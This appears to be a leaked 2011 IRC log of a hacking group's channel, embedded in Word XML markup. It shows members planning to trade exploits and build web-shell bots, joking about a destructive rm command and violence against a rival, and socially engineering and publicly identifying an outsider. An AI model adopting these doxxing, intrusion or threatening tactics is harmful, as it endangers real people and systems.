        <w:t>Jun 01 15:19:18 * Neuron (Neuron@HA-icg.62t.o0m95d.IP) has joined #pure- elite Jun 01 15:19:26 neuron hey o/ Jun 01 15:19:53 pwnsauce hey :) Jun 01 15:21:53 Topiary &lt;awinee&gt; Oh shit, Whirlpool is here Jun 01 15:21:54 Topiary &lt;awinee&gt; lets put the channel to +m and unvoice him so he can't speak :D Jun 01 15:21:54 Topiary &lt;awinee&gt; LULZ Jun 01 15:21:54 Topiary * Awinee gives voice to Power2All Jun 01 15:21:54 Topiary * Awinee sets ban on *!*root@*.static-host.net Jun 01 15:21:54 Topiary * You have been kicked from #awinee by Awinee (come back when you got the balls to talk to me in private) Jun 01 15:22:00 Topiary a stalker Jun 01 15:22:04 pwnsauce lmao Jun 01 15:22:06 Topiary who claims to be "within us" Jun 01 15:22:10 Topiary welp, you in here Awinee?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:22:19 pwnsauce lol no Jun 01 15:22:25 Topiary didn't think so _ Jun 01 15:22:30 pwnsauce xD Jun 01 15:23:32 pwnsauce root@awinees-mom:~# grep | Awinees Birth;rm -f * Jun 01 15:23:46 pwnsauce something liek that Jun 01 15:23:57 pwnsauce im too tired to parse correctly x( Jun 01 15:25:09 Topiary pretty sure we should pay someone to beat up Awinee IRL Jun 01 15:25:26 Topiary maybe a 12-year-old girl Jun 01 15:25:30 Topiary she could easily manage Jun 01 15:25:51 * Neuron has quit (Connection closed) Jun 01 15:26:21 * Neuron (Neuron@HA-5ve.d61.5kgcfl.IP) has joined #pure- elite Jun 01 15:29:23 neuron lol you one?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:37:21 pwnsauce Ill ask Rebeccca Black Jun 01 15:38:40 neuron pwnsauce: those busybox's have a web directory. On port 80 Jun 01 15:39:00 neuron Soo gotta create asp bot Jun 01 15:39:43 pwnsauce :D Jun 01 15:39:48 pwnsauce they no run PHP?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:39:52 pwnsauce I has PHP bot somewhere Jun 01 15:39:59 neuron no php asp :E Jun 01 15:40:11 pwnsauce gey Jun 01 15:40:12 pwnsauce hmmm Jun 01 15:40:19 pwnsauce if I give you ASP shell and PHP bot Jun 01 15:40:32 pwnsauce you can reverse engineer them or something Jun 01 15:40:44 pwnsauce you know... do the thing Jun 01 15:40:46 neuron we have a php bot Jun 01 15:40:51 neuron need asp bot Jun 01 15:41:23 pwnsauce oh *facepalms several times* sorry im a bit silly Jun 01 15:42:10 neuron its fine ive said some retarted shit today Jun 01 15:42:55 pwnsauce ah ok Jun 01 15:43:12 pwnsauce im a bit muddled cos my *nix partitions fucked and using wondows is difficult Jun 01 15:43:17 pwnsauce WHERS MY FUCKING TERMINAL Jun 01 15:43:30 neuron XD Jun 01 15:43:37 neuron click start-&gt;run type cmd Jun 01 15:43:48 pwnsauce but cmd =&gt; FAIL terminal :( Jun 01 15:44:22 pwnsauce i wants my root@yore-ma:~# Jun 01 15:44:24 pwnsauce not this Jun 01 15:44:46 pwnsauce C:\Users\root&gt; Jun 01 15:45:13 pwnsauce (my admin acc is called root on Doze also :D ) Jun 01 15:45:14 neuron lol Jun 01 15:45:45 pwnsauce OFC I have an acc called "going@~yore-ma:~$" Jun 01 15:45:51 pwnsauce cos its goin at yer ma !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:49:18 neuron lol Jun 01 15:50:24 pwnsauce hmmmmm. time to backdoor me some peoples Jun 01 15:50:41 Topiary Fox&gt; [12:34:56] &lt;fox&gt; You got a messenger? I'd be happy to toss exploits and business back and forth.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:50:46 Topiary we got people offering us exploits Jun 01 15:51:03 neuron very nice Jun 01 15:51:17 neuron Topiary: is he ligit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:51:44 Topiary he seems to know his shit, but he joined our chan on 2600 randomly (assuming from twitter) Jun 01 15:51:49 Topiary so... he's legit Jun 01 15:51:50 Topiary but Jun 01 15:51:52 Topiary not sure if we can trust him Jun 01 15:52:12 neuron well we can do business just don't let him in here? Jun 01 15:52:22 Topiary oh no no no definitely not coming in here Jun 01 15:52:26 Topiary we can set up a neutral chan on Unreal Jun 01 15:52:33 neuron sounds good Jun 01 15:52:50 Topiary this shit is sealed tight unless Sabu says the words "100% trusted" Jun 01 15:52:51 neuron wouldn't be a bad idea to get some contacts Jun 01 15:54:05 pwnsauce topiary - wht IRCd?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:54:09 pwnsauce or rather Jun 01 15:54:15 pwnsauce if they hand you exploits Jun 01 15:54:17 pwnsauce send to me Jun 01 15:54:24 pwnsauce some fags edit them or give fakes Jun 01 15:54:32 pwnsauce that really just rm -rf you : Jun 01 15:54:34 neuron aye i can read exploits as well Jun 01 15:54:39 neuron o/ Jun 01 15:54:55 pwnsauce aye - me Neuron and kayla can "check" them Jun 01 15:55:01 joepie92 I wouldn't assume anyone here would run any shit without checking what it does Jun 01 15:55:02 joepie92 tbh Jun 01 15:55:03 joepie92 lol Jun 01 15:55:17 Topiary well guys put on fake names, don't give him personal info, get onto irc.unrealirc.net (or .com can't remember), do /mode &lt;you&gt; +T Jun 01 15:55:23 Topiary then we can all talk to these fags Jun 01 15:55:26 pwnsauce joepie - I have been nailed by a few things :( Jun 01 15:55:27 Topiary as a personal business channel Jun 01 15:55:33 joepie92 pwnsauce: ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:56:52 pwnsauce joepie - fake OpenSSH exploit :( Jun 01 15:56:56 pwnsauce and some backdoored shit Jun 01 15:57:00 joepie92 ahhh Jun 01 15:57:08 joepie92 never run shit unless you read it Jun 01 15:57:18 * Neuron_ (Neuron@HA-1rf.d61.5kgcfl.IP) has joined #pure- elite Jun 01 15:57:21 pwnsauce aye, I was just SO excited Jun 01 15:57:28 pwnsauce openSSH 5.* 0day Jun 01 15:57:28 &lt;neuron_&gt; back Jun 01 15:57:30 &lt;neuron_&gt; what did i miss Jun 01 15:57:34 joepie92 lol Jun 01 15:57:44 &lt;neuron_&gt; lol hes selling one?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:57:47 pwnsauce No Jun 01 15:57:51 pwnsauce I was saying Jun 01 15:57:55 pwnsauce I got a fake sploit for it Jun 01 15:57:58 pwnsauce and it rm ed me Jun 01 15:57:59 &lt;neuron_&gt; oo :( Jun 01 15:58:04 &lt;neuron_&gt; sad day Jun 01 15:58:24 Topiary sorry that's irc.unrealircd.org Jun 01 15:58:51 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 15:59:18 Topiary okay channel is called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Jun 01 15:59:20 &lt;neuron_&gt; what channel Jun 01 15:59:39 trollpoll guys, if i were you, i would not trust anyone of this #lulzsec chan Jun 01 15:59:47 Topiary I trust none of them Jun 01 15:59:53 Topiary we can reverse SE this guy, just don't give anything away Jun 01 15:59:57 &lt;neuron_&gt; rgr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01 16:00:08 Topiary if he's Jesterfag we can use our spies to report Jun 01 16:00:56 * Topiary facepalms and LOLs at you guys Jun 01 16:00:59 Topiary &gt;Neuron joins Jun 01 16:01:03 Topiary &gt;also-cock (pwnsauce@) Jun 01 16:01:03 &lt;neuron_&gt; im fine with it :P Jun 01 16:01:16 &lt;neuron_&gt; i really don't mind my name being that :P Jun 01 16:02:06 trollpoll joepie92, you always use the same nick?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:02:13 joepie92 well Jun 01 16:02:18 trollpoll (well 91, 92...) Jun 01 16:02:18 * joepie92 is now known as joepie91 Jun 01 16:02:18 joepie91 is my actual nick Jun 01 16:02:18 trollpoll xD Jun 01 16:02:19 joepie91 but Jun 01 16:02:21 joepie91 if I disconnect Jun 01 16:02:24 joepie91 and joepie91 is still here Jun 01 16:02:31 joepie91 my client increments my nick Jun 01 16:02:32 joepie91 idk why Jun 01 16:02:38 joepie91 thus joepie91 Jun 01 16:02:38 Topiary well just make sure we never give any link to Anonymous/ourselves when talking to contacts on the IRC Jun 01 16:02:43 joepie91 I've hit shit like joepie184 before Jun 01 16:02:43 joepie91 lol Jun 01 16:02:44 trollpoll i mean, anywhere you go, you use the same nick? Jun 01 16:02:47 joepie91 ya Jun 01 16:02:51 trollpoll of course Jun 01 16:03:06 &lt;neuron_&gt; Aye Topiary Jun 01 16:03:15 Topiary okay pwnsauce you're gonna have to pretend to just be another trading partner Jun 01 16:03:18 Topiary as pwnsauce == Anonymous Jun 01 16:03:22 joepie91 trollpoll: why? :P Jun 01 16:03:45 trollpoll nothing, cos if i were you i would feel unsecure using the same nick around Jun 01 16:04:14 pwnsauce k Jun 01 16:04:57 &lt;neuron_&gt; if i randomly drop its because my connection hates me Jun 01 16:06:40 joepie91 trollpoll: I literally have pretty much nothing to hide Jun 01 16:06:43 storm hi Jun 01 16:06:45 joepie91 so how would I be insecure? :P Jun 01 16:06:51 Topiary I hope this is a Jesterfag, we can inject some fake d0x Jun 01 16:07:02 pwnsauce I hope not Jun 01 16:07:07 pwnsauce wants free exploits Jun 01 16:07:13 &lt;neuron_&gt; lol Jun 01 16:07:23 trollpoll well, just being here, is something to hide... Jun 01 16:07:34 trollpoll (in my opinion) Jun 01 16:07:43 storm good opinion Jun 01 16:07:46 &lt;neuron_&gt; lol Jun 01 16:08:20 &lt;neuron_&gt; if hes a jesterfag it would be the first time my nick is put on the map Jun 01 16:08:25 Topiary there's gold here, he knows his shit Jun 01 16:08:29 Topiary we can get something out of him Jun 01 16:08:39 sabu what you guys are doing?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:08:45 storm ]just woke up Jun 01 16:08:55 Topiary found someone in our #lulzsec chan that knows his shit, got talking to him Jun 01 16:08:57 trollpoll but, hey, i dont have nothing with this, i mean, its okey, i just where thinking on our anonymity...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:09:03 Topiary invited him to a neutral chan where we're feeling him out Jun 01 16:09:05 Topiary he's probably aspy Jun 01 16:09:22 Topiary and if he is, then we can throw them off course Jun 01 16:09:24 joepie91 trollpoll: being in an irc channel is not illegal :D Jun 01 16:09:25 Topiary if he isn't, free exploits Jun 01 16:09:29 Topiary nobody fuck up and we win Jun 01 16:09:31 Topiary ___ Jun 01 16:09:33 &lt;neuron_&gt; rgr Jun 01 16:09:43 &lt;neuron_&gt; i won't say anything other then to direct the convo Jun 01 16:09:49 trollpoll i know :) but, i dont want to be incocent, i want to look like :D Jun 01 16:09:57 joepie91 lol Jun 01 16:10:04 sabu good shit Jun 01 16:10:06 joepie91 there's a reason I typically stay clear of blatantly illegal stuff :P Jun 01 16:10:12 sabu heres the funny part Jun 01 16:10:21 trollpoll hehe, nice ;) Jun 01 16:10:27 sabu one sec Jun 01 16:11:01 &lt;neuron_&gt; Sabu: do you want irc.unrealircd.org Jun 01 16:11:05 &lt;neuron_&gt;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Jun 01 16:11:14 sabu ok sec Jun 01 16:11:59 Topiary make sure to Anon it up, also +T yourself (no CTCP) Jun 01 16:12:05 Topiary Unreal &lt;3 for that mode Jun 01 16:12:28 Topiary OH LOL you're Brazil Jun 01 16:12:40 &lt;neuron_&gt; o god XD Jun 01 16:12:59 Topiary well everyone gather round and watch Sabu go insane Jun 01 16:12:59 &lt;neuron_&gt; Wai twhats going on?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:13:03 Topiary with his Brazil impression Jun 01 16:13:16 &lt;neuron_&gt; o god Jun 01 16:13:41 trollpoll from brazil? im gonna enter the chan (ill be quiet) Jun 01 16:13:52 Topiary &lt;brazil&gt; HEUHEAUEHAUHAUEHAHEAUEHUHheuheushHUAHUehuuhuUEUue Jun 01 16:13:55 &lt;neuron_&gt; lmfao Jun 01 16:13:55 Topiary cracks me up man Jun 01 16:13:56 [redacted] LOL WUT Jun 01 16:14:03 Topiary he was doing this for like an hour in lulzsec Jun 01 16:14:04 [redacted] you got rm'd by a fake OpenSSH exploit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:14:21 pwnsauce [redacted] - yes Jun 01 16:14:27 pwnsauce and a fake IIS 6 overflow Jun 01 16:14:30 pwnsauce a year ago Jun 01 16:14:32 &lt;neuron_&gt; owch Jun 01 16:14:34 [redacted] Lulzsec - The hacker elite Jun 01 16:14:49 Topiary that's okay I became part of a Japanese botnet once Jun 01 16:14:50 sabu topiary Jun 01 16:14:54 sabu that guy that gave me senate Jun 01 16:14:58 sabu is the guy that owned g00ns Jun 01 16:14:59 sabu ROFL Jun 01 16:15:03 Topiary fucking awesome Jun 01 16:15:25 &lt;neuron_&gt; why is sabu acting like brazil again? Jun 01 16:15:38 Topiary watch and see Jun 01 16:15:44 Topiary Fox is gonna spill all the juice Jun 01 16:15:48 &lt;neuron_&gt; lul Jun 01 16:17:43 sabu I just Jun 01 16:17:45 sabu socialed Jun 01 16:17:45 sabu him Jun 01 16:17:46 sabu hard.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:17:52 * Neuron_ calps Jun 01 16:18:11 &lt;neuron_&gt; lol suddenly not typing in all acps XD Jun 01 16:18:20 sabu ;) Jun 01 16:19:07 Topiary your Brazil social game cracks me up Jun 01 16:19:11 Topiary bravo Jun 01 16:19:15 sabu ;) Jun 01 16:19:26 Topiary nobody can shut their mouths with that fucking HehuhehuheahauHAUHUhauhUAHUEHE Jun 01 16:19:30 Topiary on your ass every 2 seconds Jun 01 16:19:31 sabu hahahahhaha Jun 01 16:19:34 &lt;neuron_&gt; its so annoying XE Jun 01 16:19:45 joepie91 http://www.wired.com/threatlevel/2011/06/silkroad/ Jun 01 16:19:47 sabu its so true too have oyu guys ever talked to a real hardcore brazillian hacker?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:19:51 sabu they are out of control ....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:19:58 &lt;neuron_&gt; nope Jun 01 16:21:37 sabu &lt;brazil&gt; Fox, a gentlemen never tells Jun 01 16:21:37 sabu &lt;@Fox&gt; AHHH I LOVE THAT ANSWER Jun 01 16:21:37 sabu &lt;brazil&gt; but if you work with us Jun 01 16:21:37 sabu &lt;@Fox&gt; I literally smiled Jun 01 16:21:38 sabu &lt;@Fox&gt; rofl Jun 01 16:21:40 sabu HAHAHAHAHHAHHHAHAHAHHZHAHZHHH Jun 01 16:22:06 trollpoll lol Jun 01 16:22:23 &lt;neuron_&gt; Sabu you are a god Jun 01 16:22:24 &lt;neuron_&gt; :P Jun 01 16:22:46 sabu thanks sir Jun 01 16:23:01 &lt;neuron_&gt; is Fox trustable?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:23:02 pwnsauce Sabu - as far as he knows im some random Jun 01 16:23:04 sabu consider yourselves lucky no one really gets to see me work in action Jun 01 16:23:14 sabu no one is trustable outside out crew Jun 01 16:23:17 sabu remember that neuron Jun 01 16:23:20 sabu our* Jun 01 16:24:20 Topiary nakomis&gt; found something for you Jun 01 16:24:20 Topiary &lt;whirlpool&gt; they log PMs here Jun 01 16:24:21 Topiary &lt;nakomis&gt; k Jun 01 16:24:28 &lt;neuron_&gt; rgr Jun 01 16:24:28 Topiary that's what you call a 1337 back-and-forth Jun 01 16:24:31 Topiary put that shit in a movie Jun 01 16:24:36 &lt;neuron_&gt; haha Jun 01 16:25:11 trollpoll well, is clear that in #lulzsec channel the half part of them are feds...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:25:26 sabu yup Jun 01 16:25:45 trollpoll btw who is nakomis?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:25:48 trollpoll lol?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:25:57 Topiary some Anonfag Jun 01 16:25:58 sabu hes some ex-military guy thats "anon" Jun 01 16:26:00 sabu you know Jun 01 16:26:05 &lt;neuron_&gt; ahh Jun 01 16:26:06 sabu hes marine intelligence right topiary?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:26:08 sabu thats what he told me Jun 01 16:26:11 sabu ex-marine Jun 01 16:26:16 Topiary not sure, seen him on TinyChat Jun 01 16:26:22 Topiary the person who made that Anon wiki thinks he's with us Jun 01 16:26:29 sabu who made that Jun 01 16:26:34 Topiary nonynews Jun 01 16:26:40 Topiary we got IPs Jun 01 16:26:48 Topiary they listed you and nakomis as my "associates" Jun 01 16:27:13 trollpoll ok Jun 01 16:28:01 joepie91 joepie92- Whois list of nonyNews Jun 01 16:28:01 joepie91 joepie92- Realname: nonyNews Jun 01 16:28:01 joepie91 joepie92- Hostmask: nonyNews!~anon@server106963.santrex.net * Jun 01 16:28:01 joepie91 joepie92- nonyNews is on: #lulzsec Jun 01 16:28:01 joepie91 joepie92- Server: collective.2600.net (Arghhh, Scourge of the seven seas!) Jun 01 16:28:01 joepie91 joepie92- End of /WHOIS list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:28:41 Topiary we're gonna be using that 2600 chan as a way of correlating data from AnonOps' past/wikis Jun 01 16:28:42 trollpoll nakomis is the name of a novel character of Katherine Neville Jun 01 16:28:44 Topiary to assess spies Jun 01 16:28:46 trollpoll Nakomis Key Jun 01 16:28:49 trollpoll and... is a girl.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:28:52 Topiary it's a front really Jun 01 16:30:01 sabu this guy fox Jun 01 16:30:04 sabu might be bullshit Jun 01 16:30:11 sabu may even better jester himself Jun 01 16:30:11 * Neuron_ has quit (Ping timeout: 121 seconds) Jun 01 16:30:26 Topiary mm Jun 01 16:30:28 Topiary crossed my mind Jun 01 16:30:33 [redacted] netjester Jun 01 16:31:02 pwnsauce I'm being nice to hom Jun 01 16:31:08 pwnsauce *him Jun 01 16:31:16 pwnsauce going to get ALL his goodies Jun 01 16:31:22 Topiary by all means sap shit out of him Jun 01 16:31:29 Topiary if he is a spy, he'll do that to gain trust Jun 01 16:31:53 pwnsauce exactly Jun 01 16:31:57 pwnsauce TBH Jun 01 16:32:09 pwnsauce im just goodierping Jun 01 16:34:18 sabu HAHAHHAAHA Jun 01 16:34:20 sabu I JUST FIGUREDO UT Jun 01 16:34:21 sabu WHO HE IS Jun 01 16:34:22 sabu AHAHAHAH Jun 01 16:34:26 sabu Faggot.s Jun 01 16:34:42 trollpoll when will the Sony-CTF restart?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:04 pwnsauce Sabu - tell pl0x Jun 01 16:35:07 sabu dude Jun 01 16:35:09 sabu he fucked up Jun 01 16:35:15 pwnsauce yeag I know Jun 01 16:35:18 sabu &lt;@Fox&gt; rob@SECRETFUCKINGLAIR # ~$cat nmapawesomeness Jun 01 16:35:18 pwnsauce "rob" Jun 01 16:35:18 sabu &lt;@Fox&gt; nmap -P0 -sS -sV -O -A --defeat-rst-ratelimit - F ip_address Jun 01 16:35:18 sabu &lt;@Fox&gt; The other one is a xerobank VPN set Jun 01 16:35:18 sabu &lt;brazil&gt; all I see is a nmap line Jun 01 16:35:18 sabu &lt;@Fox&gt; I'll package up the VPN information here in a few Jun 01 16:35:18 sabu &lt;@also-cocks&gt; this is a superfast nmap string... Jun 01 16:35:18 sabu &lt;@also-cocks&gt; by the looks of it Jun 01 16:35:18 sabu &lt;@Fox&gt; I &lt;3 that string.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:18 sabu &lt;@also-cocks&gt; it rm-s the RST limit so it scans faster Jun 01 16:35:18 sabu &lt;@also-cocks&gt; hmmmm Jun 01 16:35:18 sabu &lt;brazil&gt; rob you still got access to hostgator? Jun 01 16:35:18 sabu &lt;@Fox&gt; lol, I can, but not at this second. Jun 01 16:35:18 sabu &lt;@Fox&gt; por que?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:18 sabu &lt;brazil&gt; they have a few targets I'd like to own :) Jun 01 16:35:21 pwnsauce florida Jun 01 16:35:22 sabu ROFL Jun 01 16:35:34 sabu he just admitted oh man Jun 01 16:35:36 pwnsauce Sabu - Rob, Florida, Smokes, Jun 01 16:35:36 sabu oh so bad Jun 01 16:35:45 pwnsauce pentest cmpany Jun 01 16:35:48 pwnsauce who is he?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:35:59 sabu he is founder of hostgater bro Jun 01 16:36:00 sabu lol Jun 01 16:36:06 joepie91 wat Jun 01 16:36:22 sabu hahahahahah Jun 01 16:36:26 sabu if this is the real rob Jun 01 16:36:29 sabu we have a gold mind Jun 01 16:36:31 sabu mine Jun 01 16:36:48 pwnsauce :O Jun 01 16:36:49 joepie91 wait Jun 01 16:36:49 joepie91 so Jun 01 16:36:52 sabu I know he's starting to regret coming in here Jun 01 16:36:52 joepie91 you are talking Jun 01 16:36:54 sabu or rather Jun 01 16:36:55 trollpoll hostgator? omg Jun 01 16:36:57 joepie91 to the founder of hostgator Jun 01 16:36:58 joepie91 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 16:36:58 sabu hes regretting Jun 01 16:37:02 sabu that I even fucking logged on that irc Jun 01 16:37:07 sabu I figured his whole shit out Jun 01 16:37:08 sabu rofl Jun 01 16:37:18 * joepie91 palmfaces Jun 01 16:40:23 * Disconnected (Remote host closed socket).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Wed Jun 1 16:40:23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12:49:34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12:49:34 * Now talking on #pure-elite Jun 02 12:49:34 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 12:49:34 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 12:49:38 [redacted] hello :] * * ** ENDING LOGGING AT Thu Jun 2 12:50:54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12:50:54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12:55:36 Topiary http://lulzsecurity.com/ * * ** BEGIN LOGGING AT Thu Jun 2 13:25:39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13:25:39 * Now talking on #pure-elite Jun 02 13:25:39 * Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++ Jun 02 13:25:39 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 13:29:51 Recursion Topiary: am now, whats up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
